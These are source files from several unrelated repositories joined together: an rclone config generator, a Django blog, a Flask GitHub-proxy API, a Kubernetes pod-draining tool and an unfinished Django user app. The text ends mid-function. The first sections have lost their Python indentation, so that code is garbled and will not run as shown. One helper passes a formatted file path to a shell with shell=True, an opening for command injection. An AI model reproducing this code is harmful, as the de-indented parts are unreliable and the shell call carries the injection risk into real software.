unencrypted_remote_found = True
remote_template = '[{}{:03d}]\n' \
'type = drive\n' \
'scope = drive\n' \
'service_account_file = {}\n'
if unencrypted_remote.team_drive:
remote_template += '{} = {}\n\n'.format('team_drive', unencrypted_remote.team_drive)
#elif unencrypted_remote.source_path_id:
# remote_template += '{} = {}\n\n'.format('source_path_id', unencrypted_remote.source_path_id)
if unencrypted_remote_found:
break
if not unencrypted_remote_found:
log('Invalid RClone config, crypt remote with remote that does not exist!', 'ERROR', args)
sys.exit(-1)
remote_template += '[{}{:03d}_crypt]\n' \
'type = crypt\n' \
'remote = {}{:03d}:' + crypt_remote_parts[1] + '\n' \
'filename_encryption = ' + remote.filename_encryption + '\n' \
'directory_name_encryption = ' + remote.directory_name_encryption + '\n' \
'password = ' + remote.password + '\n'
if remote.password2:
remote_template += 'password2 = ' + remote.password2 + '\n\n'
else:
remote_template += '\n'
else:
remote_template = "[{}{:03d}]\n" \
"type = drive\n" \
"scope = drive\n" \
"service_account_file = {}\n"
if remote.team_drive:
remote_template += "{} = {}\n\n".format("team_drive", remote.team_drive)
elif remote.source_path_id:
remote_template += "{} = {}\n\n".format("source_path_id", remote.source_path_id)
# If remote is found exit loop
if found:
break
if not found:
if len(src_or_dest) == 33:
folder_or_team_drive_src = 'root_folder_id'
elif len(src_or_dest) == 19:
folder_or_team_drive_src = 'team_drive'
elif is_config_file_specified:
log('The config file ' + args.rclone_config_path + ' was specified, ' + src_or_dest +
' was not a valid remote found in the config file, and is not a valid Team Drive ID or publicly shared Root Folder ID', "ERROR", args)
sys.exit(-1)
else:
log(src_or_dest + ' is not a valid Team Drive ID or publicly shared Root Folder ID', 'ERROR', args)
sys.exit(-1)
remote_template = "[{}{:03d}]\n" \
"type = drive\n" \
"scope = drive\n" \
"service_account_file = {}\n"
remote_template += "{} = {}\n\n".format(folder_or_team_drive_src, src_or_dest)
return remote_template, remote_is_crypt
def gen_rclone_cfg(args, filepath):
sa_files = glob.glob(os.path.join(args.service_account_dir, '*.json'))
if len(sa_files) == 0:
log('No json files found in ./{}'.format(args.service_account_dir), 'ERROR', args)
sys.exit(-1)
source_remote = None
dest_remote = None
src_is_crypt = False
dst_is_crypt = False
is_config_file_specified = False
parsed_config = None
if args.rclone_config_path:
is_config_file_specified = True
parsed_config = config_parser.parse_config(args.rclone_config_path)
# Source parsing
if args.source:
source_remote, src_is_crypt = gen_remote_template(args.source, parsed_config, args, is_config_file_specified)
# Destination parsing
if args.destination:
dest_remote, dst_is_crypt = gen_remote_template(args.destination, parsed_config, args,is_config_file_specified)
with open(filepath, 'w') as fp:
for i, filename in enumerate(sa_files):
dir_path = os.path.dirname(Path(os.path.realpath(__file__)).parent)
filename = os.path.join(dir_path, filename)
filename = filename.replace(os.sep, '/')
index = i + 1
if source_remote:
if src_is_crypt:
remote_type = 'src'
fp.write(source_remote.format(remote_type, index, filename, remote_type, index, remote_type, index))
else:
fp.write(source_remote.format('src', index, filename))
if dest_remote:
if dst_is_crypt:
remote_type = 'dst'
fp.write(dest_remote.format(remote_type, index, filename, remote_type, index, remote_type, index))
else:
fp.write(dest_remote.format('dst', index, filename))
return i, src_is_crypt, dst_is_crypt
--- FILE SEPARATOR ---
import sys
from dataclasses import dataclass
@dataclass
class drive_remote:
remote_name: str
team_drive: str
root_folder_id: str
@dataclass
class crypt_remote:
remote_name: str
remote: str
filename_encryption: str
directory_name_encryption: bool
# Hashed password and salt
password: str
password2: str
def parse_config(file_path):
try:
file = open(file_path, 'r')
except FileNotFoundError:
print("Rclone config file not found!")
sys.exit(-1)
config_content = file.read()
remotes_unparsed = []
remotes_tmp = config_content.split('[')
for i in range(1, len(remotes_tmp)):
remote_tmp = remotes_tmp[i].split(']\n')
# ['Remote Name', 'Remote Data']
remotes_unparsed.append([remote_tmp[0], remote_tmp[1]])
remotes_parsed = []
for remote in remotes_unparsed:
name = remote[0]
data = remote[1]
properties = []
data_tmp = data.split('\n')
# Remove empty array items caused by \n characters
data_tmp = list(filter(None, data_tmp))
for data in data_tmp:
data_split = data.split('=')
# ['Property', 'Value']
properties.append([data_split[0].strip(), data_split[1].strip()])
remotes_parsed.append([name, properties])
remotes = []
for remote in remotes_parsed:
name = remote[0]
properties = remote[1]
remote_type = None
team_drive = None
root_folder_id = None
remote = None
filename_encryption = None
directory_name_encryption = None
password = None
password2 = None
for prop in properties:
if prop[0] == "type":
remote_type = prop[1]
elif prop[0] == "team_drive":
team_drive = prop[1]
elif prop[0] == "root_folder_id":
root_folder_id = prop[1]
elif prop[0] == "remote":
remote = prop[1]
elif prop[0] == "filename_encryption":
filename_encryption = prop[1]
elif prop[0] == "directory_name_encryption":
directory_name_encryption = prop[1]
elif prop[0] == "password":
password = prop[1]
elif prop[0] == "password2":
password2 = prop[1]
if remote_type == "drive":
if team_drive or root_folder_id:
new_remote = drive_remote(name, team_drive, root_folder_id)
else:
pass
elif remote_type == "crypt":
new_remote = crypt_remote(name, remote, filename_encryption, directory_name_encryption, password, password2)
remotes.append(new_remote)
return remotes
--- FILE SEPARATOR ---
import platform
import subprocess
import sys
import distutils
import time
from pathlib import Path
import os
def is_windows():
return platform.system() == 'Windows'
def calculate_duration(time_start):
time_stop = time.time()
hours, rem = divmod((time_stop - time_start), 3600)
minutes, sec = divmod(rem, 60)
return "{:0>2}:{:0>2}:{:05.2f}".format(int(hours), int(minutes), sec)
def check_rclone_exists():
rclone_prog = 'rclone'
if is_windows():
rclone_prog += ".exe"
#ret = distutils.spawn.find_executable(rclone_prog)
ret = True
if ret is None:
sys.exit("To use AutoRClone you must install RClone first: https://rclone.org/downloads/")
return ret
def convert_bytes_to_best_unit(bytes_value):
bytes_value = float(bytes_value)
value_tmp = bytes_value * 1e-15
if value_tmp >= 1:
return str(round(value_tmp, 1)) + "PB"
value_tmp = bytes_value * 1e-12
if value_tmp >= 1:
return str(round(value_tmp, 1)) + "TB"
value_tmp = bytes_value * 1e-9
if value_tmp >= 1:
return str(round(value_tmp, 1)) + "GB"
value_tmp = bytes_value * 1e-6
if value_tmp >= 1:
return str(round(value_tmp, 1)) + "MB"
value_tmp = bytes_value * 1e-3
if value_tmp >= 1:
return str(round(value_tmp, 1)) + "kB"
return str(bytes_value) + "B"
# Calculate path size in bytes using RClone
def calculate_path_size(path, config_file):
response = subprocess.check_output('rclone --config {} size \"{}\"'.format(config_file, path), shell=True, stderr=subprocess.DEVNULL)
response_processed = response.decode('utf-8').replace('\0', '')
response_bytes = response_processed.split('(')[1]
response_bytes = response_bytes.replace('Bytes)', '').strip()
return response_bytes
def log(msg, level, args, end=None):
if level == "DEBUG" and not args.debug:
return
ts = time.gmtime()
timestamp = time.strftime("%Y-%m-%d %H:%M:%S", ts)
message = '[{}] [AutoRClone] ({}) [{}] {}\n'.format(timestamp, args.name, level, msg)
if end:
print(message.replace('\n', ''), end=end)
else:
print(message.replace('\n', ''))
# File logging
file_path = args.log_file
Path(os.path.split(file_path)[0]).mkdir(parents=True, exist_ok=True)
logfile = open(file_path, 'a+')
logfile.write(message)
logfile.close()
def calculate_transfer_eta(bytes_to_transfer, transfer_speed_bytes):
if bytes_to_transfer == 0 or transfer_speed_bytes == 0:
return "Calculating ETA..."
# time in seconds
time = bytes_to_transfer / transfer_speed_bytes
hours, rem = divmod((time), 3600)
minutes, sec = divmod(rem, 60)
eta_string = ""
if hours > 1:
eta_string += '{}h, '.format(int(hours))
if minutes > 1:
eta_string += '{}m, '.format(int(minutes))
if sec > 1:
eta_string += '{}s'.format(int(sec))
return eta_string
|
[
"/autorclone.py",
"/config.py",
"/start.py",
"/util/arg_parser.py",
"/util/config.py",
"/util/config_gen.py",
"/util/config_parser.py",
"/util/helpers.py"
] |
001vijay1/onlineproject
|
from django.contrib import admin
from .models import Post,Comment,Contact,Category
# Register your models here.
admin.site.register(Post)
admin.site.register(Category)
admin.site.register(Contact)
admin.site.register(Comment)
--- FILE SEPARATOR ---
# Generated by Django 2.2.4 on 2019-10-20 11:28
import ckeditor_uploader.fields
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Created at')),
('updated_at', models.DateTimeField(auto_now=True, verbose_name='Updated at')),
('title', models.CharField(max_length=255, verbose_name='Title')),
],
options={
'verbose_name': 'Category',
'verbose_name_plural': 'Categories',
'ordering': ['title'],
},
),
migrations.CreateModel(
name='Contact',
fields=[
('msg_id', models.AutoField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=50)),
('email', models.CharField(default='', max_length=50)),
('phone', models.CharField(default='', max_length=50)),
('desc', models.CharField(default='', max_length=500)),
],
),
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('image', models.ImageField(default='asc.png', upload_to='banner_image')),
('description', ckeditor_uploader.fields.RichTextUploadingField(blank=True, null=True)),
('slug', models.SlugField(max_length=200, unique=True)),
('date', models.DateTimeField(auto_now_add=True)),
('auther', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blogapp.Category', verbose_name='Category')),
],
options={
'ordering': ('-date',),
},
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('email', models.EmailField(max_length=254)),
('message', models.TextField()),
('created', models.DateTimeField(auto_now_add=True)),
('active', models.BooleanField(default=True)),
('parent', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='replies', to='blogapp.Comment')),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='comments', to='blogapp.Post')),
],
options={
'ordering': ('-created',),
},
),
]
--- FILE SEPARATOR ---
from ckeditor_uploader.fields import RichTextUploadingField
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import pre_save
from django.dispatch import receiver
from django.utils import timezone
# Create your models here.
from django.utils.text import slugify
class Category(models.Model):
created_at = models.DateTimeField(auto_now_add=True, verbose_name="Created at")
updated_at = models.DateTimeField(auto_now=True, verbose_name="Updated at")
title = models.CharField(max_length=255, verbose_name="Title")
class Meta:
verbose_name = "Category"
verbose_name_plural = "Categories"
ordering = ['title']
def __str__(self):
return self.title
class Post(models.Model):
auther = models.ForeignKey(User,on_delete=models.CASCADE)
title = models.CharField(max_length=100)
category = models.ForeignKey(Category, verbose_name="Category",on_delete=models.CASCADE)
image = models.ImageField(upload_to='banner_image',default='asc.png')
description = RichTextUploadingField(blank=True,null=True)
slug = models.SlugField(max_length=200,unique=True)
date = models.DateTimeField(auto_now_add=True)
class Meta:
ordering = ('-date',)
def publish(self):
self.is_published = True
self.published_at = timezone.now()
self.save()
def save(self, *args, **kwargs):
self.slug = self.slug or slugify(self.title)
super().save(*args, **kwargs)
def __str__(self):
return self.title
class Comment(models.Model):
post = models.ForeignKey(Post,on_delete=models.CASCADE,related_name='comments')
name = models.CharField(max_length=50)
email = models.EmailField()
message = models.TextField()
created = models.DateTimeField(auto_now_add=True)
active = models.BooleanField(default=True)
parent = models.ForeignKey('self',on_delete=models.CASCADE,null=True,blank=True,related_name='replies')
class Meta:
ordering = ('-created',)
def __str__(self):
return 'Commented by {}'.format(self.name)
#django signal
@receiver(pre_save,sender = Post)
def delete_old_image(sender,instance,*args,**kwargs):
if(instance.pk):
existing_image = Post.objects.get(pk=instance.pk)
if(instance.image and existing_image.image!=instance.image):
existing_image.image.delete(True)
class Contact(models.Model):
msg_id=models.AutoField(primary_key=True)
name=models.CharField(max_length=50)
email=models.CharField(max_length=50,default="")
phone=models.CharField(max_length=50,default="")
desc=models.CharField(max_length=500,default="")
def __str__(self):
return self.name
--- FILE SEPARATOR ---
from django.shortcuts import render,get_object_or_404,redirect
from .models import Post,Contact,Comment,Category
from .forms import CommentForm
# Create your views here.
def index(request):
form = Post.objects.all()
return render(request,'index.html',{'form':form})
def category_detail(request, pk):
category = get_object_or_404(Category, pk=pk)
return render(request, 'blog-single.html', {'category': category})
def blogdetails(request,slug):
relpost = Post.objects.all().filter(slug = slug)
categories = Category.objects.all()
posts = get_object_or_404(Post,slug=slug)
comments = posts.comments.filter(active=True, parent__isnull=True)
if(request.method=='POST'):
comment_form = CommentForm(data=request.POST)
if(comment_form.is_valid()):
parent_obj = None
try:
parent_id = int(request.POST.get('parent_id'))
except:
parent_id = None
if(parent_id):
parent_obj=Comment.objects.get(id = parent_id)
if(parent_obj):
reply_comment = comment_form.save(commit=False)
reply_comment.parent= parent_obj
new_comment = comment_form.save(commit=False)
new_comment.post = posts
new_comment.save()
return redirect('blogdetails',slug)
else:
comment_form = CommentForm()
context = {
'post':posts,
'comments':comments,
'comment_form':comment_form,
'category':categories,
'relpost':relpost,
}
return render(request,'blog-single.html',context)
def contact(request):
thanks = False
if(request.method=='POST'):
name = request.POST.get('name')
email = request.POST.get('email')
phone = request.POST.get('phone')
desc = request.POST.get('desc')
contact = Contact(name = name,email = email,phone = phone,desc = desc)
contact.save()
thanks = True
return render(request,'contact.html',{'thanks':thanks})
def about(request):
return render(request,'about.html')
|
[
"/blog/blogapp/admin.py",
"/blog/blogapp/migrations/0001_initial.py",
"/blog/blogapp/models.py",
"/blog/blogapp/views.py"
] |
0054/test
|
from flask import Flask
def create_app():
app = Flask(__name__)
from api.routes import api
app.register_blueprint(api)
return app
--- FILE SEPARATOR ---
from flask import current_app, Blueprint, jsonify
import requests
api = Blueprint('api', __name__)
URL = 'https://api.github.com'
@api.route('/')
def index():
return '''usage:
URL:5000/repo/<reponame>
URL:5000/check'''
@api.route('/repo/<reponame>')
def repo(reponame):
r = requests.get(URL + '/repos/0054/' + reponame).json()
return r
@api.route('/check')
def events():
r = requests.get(URL).json()
return r
--- FILE SEPARATOR ---
def test_200_root(client):
response = client.get("/")
assert response.status_code == 200
def test_200_repo_dotfiles(client):
response = client.get("/repo/dofiles")
assert response.status_code == 200
def test_200_events(client):
response = client.get("/check")
assert response.status_code == 200
|
[
"/api/__init__.py",
"/api/routes.py",
"/tests/test_api.py"
] |
007/nedry
|
import json
import random
import time
import kubernetes
from termcolor import colored
class NedryKube:
_DEBUG = False
# Wait up to 2x expected timeout for actions in pod deletion
POD_DELETE_MAX_WAIT = 2
def __init__(self):
self._api = {}
def k8s_ensure_initialized(self):
if 'initialized' not in self._api:
kubernetes.config.load_kube_config()
self._api['initialized'] = True
@property
def api_core(self):
if 'core' not in self._api:
self.k8s_ensure_initialized()
self._api['core'] = kubernetes.client.CoreV1Api()
self._api['core'].pool = None
return self._api['core']
@property
def api_extv1b1(self):
if 'extv1b1' not in self._api:
self.k8s_ensure_initialized()
self._api['extv1b1'] = kubernetes.client.ExtensionsV1beta1Api()
self._api['extv1b1'].pool = None
return self._api['extv1b1']
@property
def api_appsv1b1(self):
if 'appsv1b1' not in self._api:
self.k8s_ensure_initialized()
self._api['appsv1b1'] = kubernetes.client.AppsV1beta1Api()
self._api['appsv1b1'].pool = None
return self._api['appsv1b1']
def get_worker_nodes(self):
nodes = []
node_list = self.api_core.list_node(watch=False)
for n in node_list.items:
if 'kubernetes.io/role' in n.metadata.labels:
if n.metadata.labels['kubernetes.io/role'] == 'node':
nodes.append(n)
return nodes
def get_all_pods(self, ordered=False):
ret = self.api_core.list_pod_for_all_namespaces(watch=False)
if not ordered:
random.shuffle(ret.items)
return ret.items
def get_pods_on_node(self, nodes):
pods = []
match_names = []
for n in nodes:
match_names.append(n.metadata.name)
for p in self.get_all_pods():
if p.spec.node_name in match_names:
pods.append(p)
return pods
def calculate_max_probe_timeout(self, probe):
probe_timeout = probe.initial_delay_seconds
probe_timeout += probe.success_threshold * (probe.timeout_seconds + probe.period_seconds)
return probe_timeout
def calculate_wait_timeout(self, spec):
data = spec.template.spec
wait_timeout = 0
wait_timeout += data.termination_grace_period_seconds
container_max = -1
for container in data.containers:
container_live_timeout = 0
container_ready_timeout = 0
if container.liveness_probe:
container_live_timeout = self.calculate_max_probe_timeout(container.liveness_probe)
if container_live_timeout > container_max:
container_max = container_live_timeout
if container.readiness_probe:
container_ready_timeout = self.calculate_max_probe_timeout(container.readiness_probe)
if container_ready_timeout > container_max:
container_max = container_ready_timeout
return wait_timeout + container_max
def get_controller_status(self, namespace, controller_name, controller_type):
if self._DEBUG:
print('Looking up status of {controller_type} for {controller_name} in {space}'.format(
controller_type=controller_type,
controller_name=controller_name,
space=namespace))
controller_status = {'want': 0, 'ready': 0, 'available': 0, 'wait_timeout': 1}
# from most-common to least-common within our cluster
if controller_type == 'ReplicaSet':
# { # Ignore PyCommentedCodeBear
# "type": "ReplicaSet",
# "available_replicas": 1,
# "conditions": "",
# "fully_labeled_replicas": 1,
# "observed_generation": 3,
# "ready_replicas": 1,
# "replicas": 1
# }
rs = self.api_extv1b1.read_namespaced_replica_set_status(controller_name, namespace)
controller_status['want'] = rs.status.replicas
controller_status['ready'] = rs.status.ready_replicas
controller_status['available'] = rs.status.available_replicas
controller_status['wait_timeout'] = self.calculate_wait_timeout(rs.spec)
elif controller_type == 'StatefulSet':
# { # Ignore PyCommentedCodeBear
# "type": "StatefulSet",
# "collision_count": "",
# "conditions": "",
# "current_replicas": "",
# "current_revision": "service-713823586",
# "observed_generation": 4,
# "ready_replicas": 3,
# "replicas": 3,
# "update_revision": "service-4122884199",
# "updated_replicas": 3
# }
ss = self.api_appsv1b1.read_namespaced_stateful_set_status(controller_name, namespace)
controller_status['want'] = ss.status.replicas
controller_status['ready'] = ss.status.ready_replicas
controller_status['available'] = ss.status.ready_replicas
controller_status['wait_timeout'] = self.calculate_wait_timeout(ss.spec)
elif controller_type == 'DaemonSet':
# { # Ignore PyCommentedCodeBear
# "type": "DaemonSet",
# "collision_count": "",
# "conditions": "",
# "current_number_scheduled": 3,
# "desired_number_scheduled": 3,
# "number_available": 3,
# "number_misscheduled": 0,
# "number_ready": 3,
# "number_unavailable": "",
# "observed_generation": 32,
# "updated_number_scheduled": 3
# }
ds = self.api_extv1b1.read_namespaced_daemon_set_status(controller_name, namespace)
controller_status['want'] = ds.status.desired_number_scheduled
controller_status['ready'] = ds.status.number_ready
controller_status['available'] = ds.status.number_available
controller_status['wait_timeout'] = self.calculate_wait_timeout(ds.spec)
elif controller_type == 'Job':
print('JOB type not yet supported')
else:
print('Unknown parent type: {}'.format(controller_type))
return controller_status
def wait_for_healthy_controller(self, namespace, controller_name, controller_type):
status = self.get_controller_status(namespace, controller_name, controller_type)
print('Current state of {controller_type}.{controller_name} in {space} is '
'want: {want}, ready: {ready}, available: {available}'.format(
controller_type=controller_type,
controller_name=controller_name,
space=namespace,
**status
)
)
wait_timeout = status['wait_timeout'] * self.POD_DELETE_MAX_WAIT
if self._DEBUG:
print('Waiting up to {} seconds for pod to stabilize'.format(wait_timeout))
for loop in range(wait_timeout):
status = self.get_controller_status(namespace, controller_name, controller_type)
if status['want'] == status['ready'] and status['ready'] == status['available']:
break
time.sleep(1)
return status['want'] == status['ready'] and status['ready'] == status['available']
def delete_pod(self, namespace, pod_name, grace_period):
delete_options = kubernetes.client.V1DeleteOptions()
response = self.api_core.delete_namespaced_pod(pod_name, namespace, delete_options)
time.sleep(grace_period + 1)
def safe_delete_pod(self, pod):
namespace = pod.metadata.namespace
pod_name = pod.metadata.name
if pod.metadata.owner_references is None:
print(colored("*** {} is an orphan pod - that's weird and scary, so I'm outta here".format(pod_name), 'yellow'))
return
owner = pod.metadata.owner_references[0]
owner_type = owner.kind
owner_name = owner.name
if owner_type == 'DaemonSet':
print(colored("*** {} is part of a daemonset, not deleting".format(pod_name), 'yellow'))
return
status = self.wait_for_healthy_controller(namespace, owner_name, owner_type)
if status is False:
print(colored('Timed out waiting for controller {owner_type} for {pod} to go healthy, not deleting'.format(
owner_type=owner_type,
pod=pod_name),
'yellow',
'on_red'
))
return
print('Service is healthy, deleting pod {}'.format(pod_name))
self.delete_pod(namespace, pod_name, pod.spec.termination_grace_period_seconds)
status = self.wait_for_healthy_controller(namespace, owner_name, owner_type)
if status is False:
print(colored('Timed out waiting for controller {owner_type} for {pod} to come back up healthy'.format(
owner_type=owner_type,
pod=pod_name),
'yellow',
'on_red'
))
return
if self._DEBUG:
print('back to happy')
return
def suffixed_to_num(self, num):
if num[-1] == 'i':
suffix = num[-2:]
value = int(num[:-2])
if suffix == 'Ki':
return value * 1024
if suffix == 'Mi':
return value * 1024 * 1024
if suffix == 'Gi':
return value * 1024 * 1024 * 1024
if suffix == 'Ti':
return value * 1024 * 1024 * 1024 * 1024
elif num[-1] == 'm':
value = int(num[:-1])
return value
# fallthrough, assume we got a raw numeric value
return int(num)
def get_metrics(self):
    """Fetch per-pod cpu/memory usage from heapster via the kube-system
    service proxy.

    Returns a dict keyed by namespace, then pod name, each entry holding
    'cpu' and 'mem' totals summed over the pod's containers.
    """
    raw_json = self.api_core.connect_get_namespaced_service_proxy_with_path('heapster', 'kube-system', '/apis/metrics/v1alpha1/pods')
    # The proxy response uses single quotes; swap them for double quotes so
    # json.loads accepts it.  NOTE(review): this breaks if any field value
    # legitimately contains a quote character — fragile by design.
    raw = json.loads(raw_json.translate(str.maketrans("'", '"')))
    metrics = {}
    for e in raw['items']:
        cpu = 0
        mem = 0
        # Sum usage across every container in the pod.
        for c in e['containers']:
            usage = c['usage']
            cpu = cpu + self.suffixed_to_num(usage['cpu'])
            mem = mem + self.suffixed_to_num(usage['memory'])
        m = e['metadata']
        k8s_namespace = m['namespace']
        k8s_podname = m['name']
        if k8s_namespace not in metrics:
            metrics[k8s_namespace] = {}
        metrics[k8s_namespace][k8s_podname] = {'cpu': cpu, 'mem': mem}
    return metrics
--- FILE SEPARATOR ---
#!/usr/bin/env python -u
import argparse
import datetime
from kube import NedryKube
from termcolor import colored
class Nedry:
    """CLI driver: drains annotated nodes and soft-kills pods that exceed
    their annotated memory soft limit.  All control annotations live under
    the 'nedry-v1/' prefix."""

    _DEBUG = False
    ANNOTATION_PREFIX = 'nedry-v1/'
    ANNOTATION_ACTION = ANNOTATION_PREFIX + 'action'
    ANNOTATION_SOFTLIMIT = ANNOTATION_PREFIX + 'limit'
    ACTION_NOMATCH = None
    ACTION_DRAIN = 'drain'

    def __init__(self):
        self.kube = NedryKube()

    def log(self, x):
        """Print x prefixed with a timestamp."""
        print('{}: {}'.format(datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%S.%f%z'), x))

    def filter_nodes_by_action(self, action=ACTION_NOMATCH):
        """Return worker nodes whose nedry action annotation equals `action`."""
        filtered = []
        for n in self.kube.get_worker_nodes():
            # Objects with no annotations report None (not an empty dict),
            # which would make the membership test below raise TypeError.
            annotations = n.metadata.annotations or {}
            # skip node if it has no annotation
            if self.ANNOTATION_ACTION not in annotations:
                continue
            # attempt to match our filter
            if annotations[self.ANNOTATION_ACTION] == action:
                filtered.append(n)
        return filtered

    def nodes_to_drain(self):
        """Nodes annotated for drain that are already cordoned."""
        filtered = []
        for n in self.filter_nodes_by_action(self.ACTION_DRAIN):
            if n.spec.unschedulable:
                filtered.append(n)
        return filtered

    def drain(self):
        """Safely reschedule every pod off the drainable nodes."""
        actionable_nodes = self.nodes_to_drain()
        pods_to_drain = self.kube.get_pods_on_node(actionable_nodes)
        self.log('Rescheduling {} pods'.format(len(pods_to_drain)))
        for p in pods_to_drain:
            self.kube.safe_delete_pod(p)
        self.log('done')

    def softlimit(self):
        """Soft-kill pods whose memory usage exceeds their annotated limit."""
        self.log("fetching pods")
        pods = self.kube.get_all_pods()
        self.log("fetching metrics")
        metrics = self.kube.get_metrics()
        self.log("mashing everything up")
        for p in pods:
            # Same None-annotations guard as filter_nodes_by_action.
            annotations = p.metadata.annotations or {}
            if self.ANNOTATION_SOFTLIMIT in annotations:
                limit = self.kube.suffixed_to_num(annotations[self.ANNOTATION_SOFTLIMIT])
                k8s_namespace = p.metadata.namespace
                k8s_podname = p.metadata.name
                if k8s_namespace in metrics:
                    ns_metrics = metrics[k8s_namespace]
                    if k8s_podname in ns_metrics:
                        actual = ns_metrics[k8s_podname]['mem']
                        if actual > limit:
                            self.log(colored('{ns}/{pod}: {actual} > {limit}, soft kill'.format(
                                actual=actual,
                                limit=limit,
                                ns=k8s_namespace,
                                pod=k8s_podname),
                                'yellow',
                                'on_red'
                            ))
                            self.kube.safe_delete_pod(p)
                        else:
                            self.log(colored('{ns}/{pod}: {actual} < {limit}, no action'.format(
                                actual=actual,
                                limit=limit,
                                ns=k8s_namespace,
                                pod=k8s_podname),
                                'green'
                            ))
if __name__ == '__main__':
    # Build the kube client up front; subcommands bind directly to Nedry
    # bound methods via argparse defaults.
    nedry = Nedry()
    parser = argparse.ArgumentParser(prog='nedry')
    # With no subcommand given, print usage rather than doing anything.
    parser.set_defaults(action=parser.print_help)
    subparsers = parser.add_subparsers(help='sub-command help')
    drain_parser = subparsers.add_parser('drain', help='drain a node safely')
    drain_parser.set_defaults(action=nedry.drain)
    softlimit_parser = subparsers.add_parser('softlimit', help='run soft-kill for soft memory limits')
    softlimit_parser.set_defaults(action=nedry.softlimit)
    args = parser.parse_args()
    args.action()
|
[
"/kube.py",
"/nedry.py"
] |
007Saikat/idil_demo
|
from django import forms
from django.contrib.auth.models import User
from .models import UserDetail
class UserForm(forms.ModelForm):
    """Registration form for the built-in User model, with Bootstrap
    'form-control' styling and placeholder text on every widget."""
    password=forms.CharField(widget=forms.PasswordInput(attrs={'placeholder':'Enter Password*','class':"form-control"}))
    username=forms.CharField(widget=forms.TextInput(attrs={'placeholder':'Enter username*','class':"form-control"}))
    first_name = forms.CharField(max_length=75, required=True,widget= forms.TextInput(attrs={'placeholder':'Enter your first name*','class': "form-control"}))
    last_name=forms.CharField(max_length=75,required=False,widget= forms.TextInput(attrs={'placeholder':'Enter your Last name','class': "form-control"}))
    email = forms.CharField(max_length=75, required=True,widget= forms.TextInput(attrs={'placeholder':'Enter email address*','class': "form-control"}))
    class Meta():
        model=User
        fields=('username','first_name','last_name','email','password')
class UserDetailForm(forms.ModelForm):
    """Companion form collecting only the optional profile picture for the
    UserDetail profile model."""
    profile_pic=forms.ImageField(required=False)
    class Meta():
        model=UserDetail
        fields=('profile_pic',)
--- FILE SEPARATOR ---
# Generated by Django 3.0.3 on 2020-08-17 18:17
from django.db import migrations, models
class Migration(migrations.Migration):
    """Relax UserDetail.role to an optional free-text field (blank/null,
    default 'employee')."""

    dependencies = [
        ('basic_app', '0002_auto_20200817_1353'),
    ]

    operations = [
        migrations.AlterField(
            model_name='userdetail',
            name='role',
            field=models.CharField(blank=True, default='employee', max_length=100, null=True),
        ),
    ]
--- FILE SEPARATOR ---
# Generated by Django 3.0.3 on 2020-08-19 16:55
from django.db import migrations, models
class Migration(migrations.Migration):
    """Constrain UserDetail.role to an admin/employee choice field with
    default 'E' (employee)."""

    dependencies = [
        ('basic_app', '0005_auto_20200819_2116'),
    ]

    operations = [
        migrations.AlterField(
            model_name='userdetail',
            name='role',
            field=models.CharField(choices=[('A', 'admin'), ('E', 'employee')], default='E', max_length=128),
        ),
    ]
--- FILE SEPARATOR ---
from django.db import models
from django.contrib.auth.models import User
import os
from uuid import uuid4
def path_and_rename(instance, filename):
    """Build an upload path under profile_pics/.

    Saved instances are named after their primary key; unsaved ones get a
    random hex name.  The original file extension is preserved.
    """
    extension = filename.split('.')[-1]
    # Unsaved instances (falsy pk) get a random, collision-resistant name.
    stem = instance.pk if instance.pk else uuid4().hex
    return os.path.join('profile_pics', '{}.{}'.format(stem, extension))
# Create your models here.
class UserDetail(models.Model):
    """Per-user profile data attached one-to-one to the auth User."""
    user=models.OneToOneField(User,on_delete=models.CASCADE)
    # Free-text role label; later migrations alter this field's constraints.
    role=models.CharField(max_length=128,default='employee')
    profile_pic=models.ImageField(upload_to=path_and_rename,blank=True,null=True)
    # Tracked separately from auth User.last_login.
    last_login = models.DateTimeField(blank=True,null=True)
    def __str__(self):
        return self.user.username
--- FILE SEPARATOR ---
from django.urls import path,include
from basic_app import views
app_name='basic_app'

# Every detail route carries a '<username>' path segment; for show/apply it
# is a composite '<user>_<challenge>' string that the views split themselves.
urlpatterns = [
    path('',views.login_register,name='login_register'),
    path('index/',views.index,name='index'),
    path('manage_acc/<username>',views.acc,name='acc'),
    path('upload/<username>',views.upload,name='upload'),
    path('save/<username>',views.save,name='save'),
    path('change/<username>',views.change,name='change'),
    path('update/<username>',views.update,name='update'),
    path('show/<username>',views.show,name='show'),
    path('apply/<username>',views.apply,name='apply'),
    path('logout',views.user_logout,name='user_logout'),
]
--- FILE SEPARATOR ---
from django.shortcuts import render,redirect
from .forms import UserForm,UserDetailForm
from django.http import HttpResponse,HttpResponseRedirect
from django.contrib.auth import login
from django.utils import timezone
from django.contrib.auth.decorators import login_required
from django.contrib.auth import authenticate,login,logout
from django.urls import reverse
from .models import User,UserDetail
from user_admin.models import UserAdmin,Challenges,AppliedChallenges
from idil import settings
import os
import cv2
# Create your views here.
@login_required
def home(request,username):
    """Render the user home page: the user's profile, all challenges, and
    whether/with how many points the user has applied."""
    context={}
    print(username+'sjh')
    user_list=User.objects.all()
    challenges=Challenges.objects.all()
    ac=AppliedChallenges.objects.all()
    context['challenges']=challenges
    appl=True
    p=0
    # NOTE(review): lookups below scan entire tables and compare str()
    # forms rather than filtering by field — presumably usernames are
    # unique; verify against the model.
    for u in user_list:
        if str(u)==str(username):
            user_info=u
            context['usr']=user_info
    users=UserDetail.objects.all()
    for user2 in users:
        if str(user2)==str(username):
